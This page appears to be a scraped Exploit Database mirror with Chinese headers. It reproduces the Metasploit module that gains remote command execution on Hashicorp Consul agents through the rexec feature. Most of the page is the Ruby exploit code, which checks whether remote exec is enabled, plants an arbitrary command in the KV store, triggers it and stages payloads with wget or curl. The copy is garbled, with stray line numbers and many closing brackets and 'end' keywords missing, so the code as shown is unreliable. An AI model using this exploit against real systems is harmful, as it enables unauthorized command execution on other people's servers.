Hashicorp Consul – Remote Command Execution via Rexec (Metasploit)

Exploit Database
114 阅读

作者： Metasploit

日期： 2019-01-02
类别：
- remote
平台：
- linux
来源：https://www.exploit-db.com/exploits/46073/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::CmdStager

def initialize(info={})

super(update_info(info,

'Name' => "Hashicorp Consul Remote Command Execution via Rexec",

'Description'=> %q{

This module exploits a feature of Hashicorp Consul named rexec.

'License'=> MSF_LICENSE,

'Author' =>

[

'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC

'Francis Alexander <helofrancis[at]gmail.com>', # Discovery and PoC

'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module

'References' =>

[

[ 'URL', 'https://www.consul.io/docs/agent/options.html#disable_remote_exec' ],

[ 'URL', 'https://www.consul.io/docs/commands/exec.html'],

[ 'URL', 'https://github.com/torque59/Garfield' ]

'Platform'=> 'linux',

'Targets' => [ [ 'Linux', {} ] ],

'Payload' => {},

'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'wget', 'curl' ],

'Privileged' => false,

'DefaultTarget'=> 0,

'DisclosureDate' => 'Aug 11 2018'))

register_options(

[

OptString.new('TARGETURI', [true, 'The base path', '/']),

OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),

OptInt.new('TIMEOUT', [false, 'The timeout to use when waiting for the command to trigger', 20]),

OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),

Opt::RPORT(8500)

])

end

def check

uri = target_uri.path

res = send_request_cgi({

'method'=> 'GET',

'uri' => normalize_uri(uri, "/v1/agent/self"),

'headers' => {

'X-Consul-Token' => datastore['ACL_TOKEN']

}

})

unless res

vprint_error 'Connection failed'

return CheckCode::Unknown

end

begin

agent_info = JSON.parse(res.body)

if agent_info["Config"]["DisableRemoteExec"] == false || agent_info["DebugConfig"]["DisableRemoteExec"] == false

return CheckCode::Vulnerable

else

return CheckCode::Safe

end

rescue JSON::ParserError

vprint_error 'Failed to parse JSON output.'

return CheckCode::Unknown

end

def execute_command(cmd, opts = {})

uri = target_uri.path

print_status('Creating session.')

res = send_request_cgi({

'method' => 'PUT',

'uri' => normalize_uri(uri, 'v1/session/create'),

'headers' => {

'X-Consul-Token' => datastore['ACL_TOKEN']

'ctype' => 'application/json',

'data' => {:Behavior => "delete", :Name => "Remote Exec", :TTL => "15s"}.to_json

})

if res and res.code == 200

begin

sess = JSON.parse(res.body)

print_status("Got rexec session ID #{sess['ID']}")

rescue JSON::ParseError

fail_with(Failure::Unknown, 'Failed to parse JSON output.')

end

print_status("Setting command for rexec session #{sess['ID']}")

res = send_request_cgi({

'method' => 'PUT',

'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/job?acquire=#{sess['ID']}"),

'headers' => {

'X-Consul-Token' => datastore['ACL_TOKEN']

'ctype' => 'application/json',

'data' => {:Command => "#{cmd}", :Wait => 2000000000}.to_json

})

if res and not res.code == 200 or res.body == 'false'

fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')

end

print_status("Triggering execution on rexec session #{sess['ID']}")

res = send_request_cgi({

'method' => 'PUT',

'uri' => normalize_uri(uri, "v1/event/fire/_rexec"),

'headers' => {

'X-Consul-Token' => datastore['ACL_TOKEN']

'ctype' => 'application/json',

'data' => {:Prefix => "_rexec", :Session => "#{sess['ID']}"}.to_json

})

if res and not res.code == 200

fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')

end

begin

Timeout.timeout(datastore['TIMEOUT']) do

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms"),

'headers' => {

'X-Consul-Token' => datastore['ACL_TOKEN']

}

})

begin

data = JSON.parse(res.body)

break if data.include? 'out'

rescue JSON::ParseError

fail_with(Failure::Unknown, 'Failed to parse JSON output.')

end

sleep 2

end

rescue Timeout::Error

# we catch this error so cleanup still happen afterwards

print_status("Timeout hit, error with payload ?")

end

print_status("Cleaning up rexec session #{sess['ID']}")

res = send_request_cgi({

'method' => 'PUT',

'uri' => normalize_uri(uri, "v1/session/destroy/#{sess['ID']}"),

'headers' => {

'X-Consul-Token' => datastore['ACL_TOKEN']

}

})

if res and not res.code == 200 or res.body == 'false'

fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')

end

res = send_request_cgi({

'method' => 'DELETE',

'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}?recurse="),

'headers' => {

'X-Consul-Token' => datastore['ACL_TOKEN']

}

})

if res and not res.code == 200 or res.body == 'false'

fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')

end

def exploit

execute_cmdstager()

end